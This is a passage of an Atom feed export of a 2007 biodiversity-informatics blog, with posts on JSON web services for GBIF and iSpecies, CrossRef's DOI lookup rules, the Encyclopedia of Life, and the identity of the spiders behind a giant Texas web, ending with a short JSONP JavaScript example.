it a facelift using JSON data sources. This has significantly improved the response time for iSpecies because it is now simple and asynchronous. Rod could continue to pile on web services to his heart's content.&lt;br /&gt;&lt;br /&gt;Dave Martin is producing JSON web services for GBIF and recently added a common name and scientific name search. It occurred to me that iSpecies could initially connect to GBIF to produce arrays of scientific and GBIF-matched common names prior to sending off a search to Yahoo or Flickr. 
Most tags in these image repositories are common names. Likewise, if the Yahoo News API is of interest, then of course it would be useful to obtain common names prior to making a call to that web service. That's how the iSpecies clone above works. Oh, and scientific names are also searched when a common name is found and recognized by GBIF.&lt;br /&gt;&lt;br /&gt;This clone is naturally missing material compared to the results obtained when conducting a real iSpecies search (e.g. genomics, Google Scholar - though that is simply disabled here - and what looks to be &lt;em&gt;some&lt;/em&gt; scripting for name-recognition above the level of species). If big-player data providers like &lt;a href="http://www.ncbi.nlm.nih.gov/"&gt;NCBI&lt;/a&gt;, &lt;a href="http://www.ubio.org/"&gt;uBio&lt;/a&gt;, &lt;a href="http://barcoding.si.edu/"&gt;CBOL&lt;/a&gt;, &lt;em&gt;etc.&lt;/em&gt; produced JSON instead of or in addition to XML, then it would be incredibly easy to make custom search engines like this that can be embedded in a gadget.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvjVN8B2V6I/AAAAAAAAAEc/QzPm-_E2O3Y/s1600-h/xmp_tm.gif"&gt;&lt;img id="BLOGGER_PHOTO_ID_5114071812308096930" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RvjVN8B2V6I/AAAAAAAAAEc/QzPm-_E2O3Y/s320/xmp_tm.gif" border="0" /&gt;&lt;/a&gt;After having tinkered a lot with JSON lately, it is now abundantly clear to me that &lt;a href="http://www.eol.org/"&gt;The Encyclopedia of Life&lt;/a&gt; (EOL) species pages absolutely &lt;em&gt;must&lt;/em&gt; have DOIs and plenty of web services to repurpose the data EOL will index. 
If we really want EOL to succeed in the mass media, then these species page DOIs should also be integrated into Adobe's &lt;a href="http://www.adobe.com/products/xmp/"&gt;XMP metadata&lt;/a&gt; along with some quick and easy ways to individually- and batch-embed them.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5778181358759010529?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5778181358759010529/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5778181358759010529' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5778181358759010529'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5778181358759010529'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/ispecies-clone.html' title='iSpecies Clone'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/RvjRNsB2V5I/AAAAAAAAAEU/AsD15rczohk/s72-c/logo.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7403186900771961650</id><published>2007-09-20T09:22:00.000-06:00</published><updated>2007-10-25T13:35:33.969-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='GBIF'/><title type='text'>GBIF web services on the rise</title><content type='html'>Look out 
EOL, Dave Martin has been very quickly creating some superb web services for GBIF data. Check out the &lt;a href="http://wiki.gbif.org/dadiwiki/wikka.php?wakka=HomePage"&gt;GBIF portal wiki&lt;/a&gt; or the various name search APIs that produce text, xml, JSON, or simple deep-linking: &lt;a href="http://wiki.gbif.org/dadiwiki/wikka.php?wakka=DeveloperAPIs"&gt;HERE&lt;/a&gt;. As an example of the kinds of things Dave and Tim Robertson have been producing, here is a map gadget showing all the records in a 1 degree cell shared to GBIF from The Nearctic Spider Database:&lt;br /&gt;&lt;iframe src='http://data.gbif.org/datasets/provider/29/mapWidget?size=small' frameborder='0' scrolling='no' width='360px' height='235px'&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7403186900771961650?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7403186900771961650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7403186900771961650' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7403186900771961650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7403186900771961650'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/gbif-web-services-on-rise.html' title='GBIF web services on the rise'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4277474808172815954</id><published>2007-09-12T10:27:00.000-06:00</published><updated>2007-09-12T15:08:23.774-06:00</updated><title type='text'>EOL "WorkBench" Ideas Loosely Joined</title><content type='html'>Just how quickly The &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life's&lt;/a&gt; "WorkBench" environment can be assembled will be interesting. For those of you unfamiliar with this critical aspect of the initiative, it will be the environment in which users will access and manipulate content from web services and other data providers, EOL indexed content, and a user's local hard drive AND simultaneously contribute (if desired, I expect this to be optional) to public facing species pages. As you can imagine a suite of things have to fall into place for all the pieces to play nicely in a simple graphical user interface. Expectations are high for this application to be THE savior, which I hope will differentiate EOL from WikiSpecies and other similar projects/initiatives.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RuhUONqXX7I/AAAAAAAAAEE/sw60wad_rXQ/s1600-h/MindRaider.png"&gt;&lt;img style="cursor:pointer; cursor:hand;float:left;padding-right:10px" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RuhUONqXX7I/AAAAAAAAAEE/sw60wad_rXQ/s320/MindRaider.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5109426380414082994" /&gt;&lt;/a&gt;I envision WorkBench as a Semantic Web browser of sorts, capable of pulling dozens of data types from hundreds of sources into a drag-drop whiteboard something like a mindmap. Coincidentally, I stumbled across &lt;a href="http://mindraider.sourceforge.net/index.html"&gt;MindRaider&lt;/a&gt;. 
Though I'd much rather see a Flex-based solution (such that &lt;a href="http://labs.adobe.com/technologies/air/"&gt;Adobe AIR&lt;/a&gt; can be used), MindRaider (Java-based) developed by &lt;a href="http://www.e-mental.com/dvorka/"&gt;Martin Dvorak&lt;/a&gt; looks to be a very interesting way to organize concepts as interconnected resources and also permits a user to annotate components of the mindmap. Sharing such Semantic mindmaps is also a critical piece of the puzzle, as is making interconnections to content on a user's local hard drive.&lt;br /&gt;&lt;br /&gt;What then do we need for EOL's WorkBench? 1) web services, 2) web services, and 3) web services, AND 4) commonly structured web services such that resources acquired from hundreds of data providers do not require customized connectors.&lt;br /&gt;&lt;br /&gt;Somehow, I'd like to see data providers ALL using OpenSearch (with MediaRSS or FOAF extensions) for fulltext, federated search and/or TAPIR for the eventual &lt;a href="http://wiki.tdwg.org/twiki/bin/view/SPM/WebHome"&gt;Species Profile Model&lt;/a&gt;'s structured mark-up. Then, I'd like to see RSSBus on EOL servers. Lastly, I'd like to see a melange of MindRaider, Mindomo, and a Drupal-like solution to permit self-organization of interest groups of the kind Vince Smith champions with &lt;a href="http://vsmith.info/scratchpads"&gt;Scratchpads&lt;/a&gt;. Vince and others no doubt argue that there is great value in centralized hosting. But 99% of that advantage goes to the provider. End users don't give two hoots about this so long as the application is intuitively obvious and permits a certain degree of import, export, configuration and customization.&lt;br /&gt;&lt;br /&gt;So, the pieces of the puzzle:&lt;br /&gt;&lt;br /&gt;Providers -&gt; RSS -&gt; RSSBus -&gt; MindRaider/Mindomo/Scratchpad (in Adobe AIR) &lt;- local hard drive&lt;br /&gt;&lt;br /&gt;Sounds easy, doesn't it? 
Yeah, right.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4277474808172815954?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4277474808172815954/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4277474808172815954' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4277474808172815954'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4277474808172815954'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/eol-workbench-ideas-loosely-joined.html' title='EOL &quot;WorkBench&quot; Ideas Loosely Joined'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RuhUONqXX7I/AAAAAAAAAEE/sw60wad_rXQ/s72-c/MindRaider.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6855467859687071971</id><published>2007-09-07T22:00:00.000-06:00</published><updated>2007-11-16T10:12:51.110-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>Forward Thinking</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RuImSg5Kj1I/AAAAAAAAAD8/RNHzs4a1Xlo/s1600-h/editorial.jpg"&gt;&lt;img style="float:left; margin:0 10px 
10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RuImSg5Kj1I/AAAAAAAAAD8/RNHzs4a1Xlo/s320/editorial.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5107687026900766546" /&gt;&lt;/a&gt;&lt;br /&gt;I &lt;a href="http://ispiders.blogspot.com/2007/09/crossref-takes-step-back.html"&gt;previously criticized&lt;/a&gt; CrossRef for the implementation of new restrictive rules for use of its OpenURL service, but Ed Pentz, Executive Director of CrossRef, stopped by and reassured us that CrossRef exists to fill the gaps. The most restrictive rule has now been relaxed. Well done, Ed.&lt;br /&gt;&lt;br /&gt;While browsing around new publications in &lt;a href="http://www.springerlink.com/content/100125/"&gt;Biodiversity and Conservation&lt;/a&gt;, I caught something called "Referenced by" out of the corner of my eye. This may be old hat to most of you and I now feel ashamed that I have not yet discovered it. Perhaps I have subconsciously dismissed boxes on web sites because Google AdWare panels have constrained my eyeball movements. Anyhow, CrossRef have used the power of DOIs to provide a hyperlinked list of more recent publications that have referenced the work you are currently examining. Ed Pentz has &lt;a href="http://www.crossref.org/crweblog/2007/08/crossref_forward_linking_1.html"&gt;blogged about this new feature&lt;/a&gt;. Now, this is cool and is the stuff dreams are made of. For example, a paper by Matt Greenstone in '83 entitled, "Site-specificity and site tenacity in a wolf spider: A serological dietary analysis" (doi:&lt;a href="http://dx.doi.org/10.1007/BF00378220"&gt;10.1007/BF00378220&lt;/a&gt;) is referenced by at least 6 more recent works as exemplified in that panel including several by Matt himself. Besides the obvious way that this permits someone to peruse your life's work (provided you reference yourself and publish in journals that have bought into CrossRef), this is a slick way to keep abreast of current thinking. 
If your initial introduction to a subject is via pre-1990 publications, you can quickly examine how previous works have been used and by whom, regardless of the journal in which the citing article appeared. Hats off, CrossRef!&lt;br /&gt;&lt;br /&gt;Now, what we need is for publishing firms still mired in the dark ages to wake up to the power of DOIs. If you participate in the editorial procedures for a scientific society and your publisher has not yet stepped up by providing you with DOIs, get on the phone and jump all over them! You would be doing your readers, authors, and society a disservice if you accepted anything less than full and rapid cooperation by your chosen publisher.&lt;br /&gt;&lt;br /&gt;So Ed, will "Forward Linking" be a web service we can tap into?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6855467859687071971?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6855467859687071971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6855467859687071971' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6855467859687071971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6855467859687071971'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/forward-thinking.html' title='Forward Thinking'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail 
xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RuImSg5Kj1I/AAAAAAAAAD8/RNHzs4a1Xlo/s72-c/editorial.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1921499987971347681</id><published>2007-09-05T07:28:00.000-06:00</published><updated>2007-11-16T10:13:32.838-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>CrossRef Takes a Step Back</title><content type='html'>&lt;div style="background-color:#f0ffff;width:400px;margin:0px auto"&gt;UPDATE Sept. 8/2007: Please read the response to this post by Edward Pentz, Executive Director of CrossRef in the comments below.&lt;/div&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/Rt6yxA5Kj0I/AAAAAAAAAD0/RDzI1MtBPB0/s1600-h/new-1.png"&gt;&lt;img style="margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/Rt6yxA5Kj0I/AAAAAAAAAD0/RDzI1MtBPB0/s320/new-1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5106715582607822658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Mission statement: "CrossRef is a not-for-profit membership association whose mission is to enable easy identification and use of trustworthy electronic content by promoting the cooperative development and application of a sustainable infrastructure."&lt;/blockquote&gt;&lt;br /&gt;Not-for-profit, hunh? Money-grabbing in the professional publishing industry has once again proven to be more important than making scientific works readily accessible. As of September 7, 2007, CrossRef will roll out new rules for its OpenURL and DOI lookups. Unless you become a card-carrying CrossRef "affiliate", there will be a daily cap of 100 lookups using their OpenURL service, which will require a username/password. 
If more than 100 lookups are performed, CrossRef will reserve the right to cancel the account and will force you to buy into their senseless &lt;a href="http://www.crossref.org/04intermediaries/34affiliate_fees.html"&gt;pay-for-use system&lt;/a&gt;. Here are the new rules as described at &lt;a href="http://www.crossref.org/04intermediaries/60affiliate_rules.html"&gt;http://www.crossref.org/04intermediaries/60affiliate_rules.html&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;&lt;ol&gt;&lt;li&gt;Affiliates must sign and abide by the term of the CrossRef Affiliate Terms of Use&lt;/li&gt;&lt;li&gt;Affiliates must pay the fees listed in the CrossRef Schedule of Fees&lt;/li&gt;&lt;li&gt;The Annual Administrative Fee is based on the number of new records added to the Affiliates service(s) and/or product(s) available online&lt;/li&gt;&lt;li&gt;There are no per-DOI retrieval fees. There are no fees based on the number of links created with the Digital Identifiers.&lt;/li&gt;&lt;li&gt;Affiliates may "cache" retrieved DOIs (i.e. store them in their local systems)&lt;/li&gt;&lt;li&gt;The copyright owner of a journal has the sole authority to designate, or authorize an agent to designate, the depositor and resolution URL for articles that appear in that journal&lt;/li&gt;&lt;li&gt;A primary journal (whether it is hosted by the publisher or included in an aggregator or database service) must be deposited in the CrossRef system before a CrossRef Member or Affiliate can retrieve DOIs for references in that article. For example, an Affiliate that hosts full text articles can only lookup DOIs for references in an article if that journal's publisher is a PILA Member and is depositing metadata for that journal in the CrossRef System&lt;/li&gt;&lt;li&gt;Real-time DOI look-up by affiliates is not permitted (that is, submitting queries to retrieve DOIs on-the-fly, at the time a user clicks a link). 
The system is designed for DOIs to be retrieved in batch mode.&lt;/li&gt;&lt;/ol&gt;&lt;/blockquote&gt;&lt;br /&gt;So what's the big deal?&lt;br /&gt;The issue has to do with scientific society back-issues like the kind served by JSTOR. Without some sort of real-time DOI look-up, it is nearly impossible to learn of newly scanned and hosted PDF reprints for older works. After September 7, the only solution available to developers and bioinformaticians is to periodically "batch upload" lookups. CrossRef sees Rod Page's bioGUID service and my simple, &lt;a href="http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html"&gt;real-time gadget&lt;/a&gt; as a threat to their steady flow of income even though both clearly fit within their general purpose "...to promote the development and cooperative use of new and innovative technologies to speed and facilitate scholarly research."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1921499987971347681?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1921499987971347681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1921499987971347681' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1921499987971347681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1921499987971347681'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/crossref-takes-step-back.html' title='CrossRef Takes a Step Back'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' 
height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/Rt6yxA5Kj0I/AAAAAAAAAD0/RDzI1MtBPB0/s72-c/new-1.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5812871391084603364</id><published>2007-09-01T17:36:00.000-06:00</published><updated>2007-10-25T13:36:17.961-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Giant Texas Spider Web</title><content type='html'>This past week, there have been &lt;a href="http://www.cbc.ca/technology/story/2007/08/30/sci-web.html?ref=rss"&gt;numerous&lt;/a&gt; &lt;a href="http://www.cnn.com/2007/US/08/30/spider.web.ap/index.html"&gt;stories&lt;/a&gt; about the Giant Texas Spider Web in Lake Tawakoni State Park such as this compiled CNN video re-posted on YouTube:&lt;br /&gt;&lt;div align="center"&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/D5NXfmxh65M"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/D5NXfmxh65M" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;iframe width="425" height="350" align="center" frameborder="no" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;ll=32.840871,-95.991669&amp;spn=0.027331,0.057077&amp;om=1&amp;msid=116660870661584453925.0004391b7af9b56f7522a&amp;output=embed&amp;s=AARTsJpoqPIn08C8wSJnttY-PbouH8_cNQ"&gt;&lt;/iframe&gt;&lt;br/&gt;&lt;a href="http://maps.google.com/maps/ms?ie=UTF8&amp;hl=en&amp;msa=0&amp;ll=32.840871,-95.991669&amp;spn=0.027331,0.057077&amp;om=1&amp;msid=116660870661584453925.0004391b7af9b56f7522a&amp;source=embed" 
style="color:#0000FF;text-align:left;font-size:small"&gt;View Larger Map&lt;/a&gt;&lt;br&gt;&lt;br /&gt;There hasn't yet been a definitive identification of the species involved (stay tuned for more), but from the videos I have seen, the primary culprit looks to be a tetragnathid (long-jawed orbweaver) and not the assumed social spiders like &lt;em&gt;Anelosimus&lt;/em&gt; spp. (doi:&lt;a href="http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;10.1111/j.1096-3642.2006.00213.x&lt;/a&gt;). This behaviour is rather unusual for a tetragnathid and reminds me of what was thought to be a mass dispersal event gone awry near McBride, British Columbia several years ago. In that case, the species involved were (in order of numerical dominance): &lt;a href="http://www.canadianarachnology.org/data/spiders/9962"&gt;&lt;em&gt;Collinsia ksenia&lt;/em&gt; (Crosby &amp; Bishop, 1928)&lt;/a&gt;, &lt;a href="http://www.canadianarachnology.org/data/spiders/10381"&gt;&lt;em&gt;Erigone aletris&lt;/em&gt; Crosby &amp; Bishop, 1928&lt;/a&gt;, a &lt;em&gt;Walckenaeria&lt;/em&gt; sp., and &lt;a href="http://www.canadianarachnology.org/data/spiders/15326"&gt;&lt;em&gt;Araniella displicata&lt;/em&gt; (Hentz, 1847)&lt;/a&gt;. See Robin Leech &lt;em&gt;et al.&lt;/em&gt;'s article in The Canadian Arachnologist (&lt;a href="http://www.canadianarachnology.org/newsletters/CA2003_Leech1.pdf"&gt;PDF&lt;/a&gt;, 180kb). 
In the case of this massive Texas webbing, there also appear to be several other species present in the vicinity as evidenced by the nice clip of &lt;a href="http://www.canadianarachnology.org/data/spiders/15350"&gt;&lt;em&gt;Argiope aurantia&lt;/em&gt; Lucas, 1833&lt;/a&gt; in the YouTube video above.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;br /&gt;Mike Quinn, who compiles "&lt;a href="http://www.texasento.net/"&gt;Texas Entomology&lt;/a&gt;", has a great page on the &lt;a href="http://www.texasento.net/Social_Spider.htm"&gt;possible identity&lt;/a&gt; of the species involved in the giant web. The candidate in the running now is &lt;a href="http://www.canadianarachnology.org/data/spiders/14193"&gt;&lt;em&gt;Tetragnatha guatemalensis&lt;/em&gt; O. P.-Cambridge, 1889&lt;/a&gt;, which has been collected from Wisconsin to Nova Scotia, south to Baja California, Florida, Panama, and the West Indies. Its usual habitat, as is the case for most tetragnathids, is streamside or lakeside shrubs and tall herbs.&lt;br /&gt;&lt;div align="center"&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/linking/deeplinkjs.asp?species=14193&amp;amp;imagetype=habitus&amp;amp;title_color=%23CCFF33&amp;amp;w=435&amp;amp;h=363&amp;amp;s=no&amp;amp;border=ridge+2px+%23000000"&gt;&lt;br /&gt;&lt;/script&gt;&lt;/div&gt;&lt;br /&gt;Another potential candidate (if these are indeed tetragnathids) is &lt;a href="http://www.canadianarachnology.org/data/spiders/14148"&gt;&lt;em&gt;Tetragnatha elongata&lt;/em&gt; Walckenaer, 1842&lt;/a&gt;. I suspect the tetragnathids and &lt;em&gt;A. aurantia&lt;/em&gt; are incidentals and not the primary culprits who made the giant mess of webbing. 
Since Robb Bennett and Ingi Agnarsson both have suspicions that the architect is &lt;a href="http://www.canadianarachnology.org/data/spiders/6957"&gt;&lt;em&gt;Anelosimus studiosus&lt;/em&gt; (Hentz, 1850)&lt;/a&gt;, and since it is highly unlikely it is a tetragnathid, I have my bets on erigonine linyphiids much like what happened in McBride, BC.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5812871391084603364?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5812871391084603364/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5812871391084603364' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5812871391084603364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5812871391084603364'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/09/giant-texas-spider-web.html' title='Giant Texas Spider Web'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8878359066787038160</id><published>2007-08-22T17:30:00.000-06:00</published><updated>2007-10-06T14:10:48.472-06:00</updated><title type='text'>JSON is Kewl</title><content type='html'>&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/wz_tooltip.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" 
src="http://www.canadianarachnology.org/bioGUID/tooltips/tip_balloon.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/tip_centerwindow.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/tooltips/tip_followscroll.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/jsonYahoo.js"&gt;&lt;/script&gt;&lt;br /&gt;While messing around with the newfangled &lt;a href="http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html"&gt;reference parser&lt;/a&gt; script that connects to &lt;a href="http://bioGUID.info"&gt;bioGUID&lt;/a&gt; to get the goods, it occurred to me that this slick, simple technique that requires next to no mark-up can be applied to all sorts of nifty things. Yahoo produces JSON for its search results and you can specify your own callback function. So, for kicks, I adjusted my JavaScript file a bit to use Yahoo instead of Rod Page's bioGUID reference parser and also added some cool &lt;a href="http://www.walterzorn.com/tooltip/tooltip_e.htm"&gt;DHTML tooltips&lt;/a&gt; developed by Walter Zorn. So, hover your mouse over a few animal and plant names that I list here in no particular order: &lt;span class="lifeform"&gt;&lt;i&gt;Latrodectus mactans&lt;/i&gt;&lt;/span&gt;, &lt;span class="lifeform"&gt;Blue Whale&lt;/span&gt;, &lt;span class="lifeform"&gt;blue fescue&lt;/span&gt;, and, Donald Hobern's favourite, &lt;span class="lifeform"&gt;&lt;i&gt;Puma concolor&lt;/i&gt;&lt;/span&gt;. Incidentally, I may as well try it with &lt;span class="lifeform"&gt;Donald Hobern&lt;/span&gt; himself (Disclaimer: I take no responsibility for what may pop-up in the tooltip). Now that I have been messing with this JavaScript for pulling JSON with a callback, I find this stuff quite exciting. 
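&lt;br /&gt;&lt;br /&gt;For anyone curious about the moving parts, pulling JSON with a callback can be sketched roughly as follows. This is an illustration only, not the contents of jsonYahoo.js: the endpoint, the parameter names ("query", "output", "callback") and the helper names buildJsonpUrl and loadJsonp are all assumptions made up for the example, so check the documentation of whatever service you call for its real parameters.&lt;br /&gt;

```javascript
// Sketch of JSON-with-callback (often called JSONP). The parameter names
// used here are hypothetical; real services document their own.
let jsonpCounter = 0;

// Build the request URL, telling the service which function to call back.
function buildJsonpUrl(endpoint, query, callbackName) {
  const url = new URL(endpoint);
  url.searchParams.set("query", query);
  url.searchParams.set("output", "json");
  url.searchParams.set("callback", callbackName);
  return url.toString();
}

// Browser only: register a one-off global callback, then add a script tag.
// The service answers with JavaScript that calls that function with the data.
function loadJsonp(endpoint, query, onData) {
  jsonpCounter += 1;
  const callbackName = "jsonpCallback" + jsonpCounter;
  const script = document.createElement("script");
  window[callbackName] = (data) => {
    delete window[callbackName]; // tidy up the global
    script.remove();             // and the script tag
    onData(data);
  };
  script.src = buildJsonpUrl(endpoint, query, callbackName);
  document.body.appendChild(script);
  return callbackName;
}
```

&lt;br /&gt;In a page, a call along the lines of loadJsonp("http://api.example.org/search", "Puma concolor", showTooltip) would fetch results for one name, where showTooltip stands for whatever function you write to display them. Because the response arrives as a script rather than through XMLHTTP, no crossdomain.xml or server-side proxy is involved.&lt;br /&gt;&lt;br /&gt;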
